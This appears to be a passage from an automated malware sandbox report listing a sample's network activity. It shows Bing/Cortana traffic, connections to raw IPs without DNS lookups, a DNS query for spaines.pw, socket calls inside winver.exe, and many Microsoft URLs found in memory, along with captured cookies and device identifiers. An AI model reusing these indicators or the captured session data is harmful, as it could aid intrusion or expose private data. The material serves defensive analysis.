            Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A4109000CC6X-BM-CBT: 1696420817X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 60X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109000CC6X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-tX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2232Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_02F02F88 send,send,recv,closesocket,2_2_02F02F88
            Source: SearchApp.exe, 0000000B.00000000.1809980582.0000024B551F3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.google.www.yahoo. equals www.yahoo.com (Yahoo)
            Source: unknownDNS traffic detected: queries for: spaines.pw
            Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A4109000CC6X-BM-CBT: 1696420817X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 60X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109000CC6X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-tX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2232Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3032615601.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: svchost.exe, 00000006.00000000.1717750240.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2954823993.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717816031.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2952613468.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3032615601.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: svchost.exe, 00000006.00000000.1717750240.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2954823993.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717816031.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2952613468.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
            Source: SearchApp.exe, 0000000B.00000000.1749414495.000002434119B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3032615601.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: svchost.exe, 00000006.00000000.1717750240.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2954823993.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717816031.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2952613468.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3032615601.000000000982D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717750240.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2954823993.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717816031.0000019E29FDC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2952613468.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: SearchApp.exe, 0000000B.00000000.1749414495.000002434119B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: SearchApp.exe, 0000000B.00000000.1767034609.0000024B441DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: explorer.exe, 00000003.00000000.1638748938.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1636906084.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1637467440.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000A.00000002.2954695107.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: explorer.exe, 00000003.00000002.3058572833.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1640019930.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: svchost.exe, 00000005.00000002.2908871960.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714413408.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 00000005.00000002.2908871960.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714413408.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
            Source: svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comt
            Source: SearchApp.exe, 0000000B.00000000.1749414495.000002434119B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1761686627.0000024B4239F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
            Source: SearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
            Source: SearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
            Source: explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
            Source: explorer.exe, 00000003.00000000.1634654042.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2936439157.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1635196527.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2901515644.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000003.00000002.3032615601.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
            Source: explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000003.00000002.3032615601.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
            Source: svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
            Source: svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
            Source: svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
            Source: svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comer
            Source: svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.coms
            Source: explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
            Source: explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
            Source: svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000006.00000002.2938509388.0000019E297F1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717384345.0000019E297F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
            Source: explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comcp
            Source: SearchApp.exe, 0000000B.00000000.1803975206.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
            Source: SearchApp.exe, 0000000B.00000000.1780439279.0000024B44916000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfillsThis
            Source: svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
            Source: SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823827959.0000024B55CEE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
            Source: svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
            Source: SearchApp.exe, 0000000B.00000000.1769556330.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api
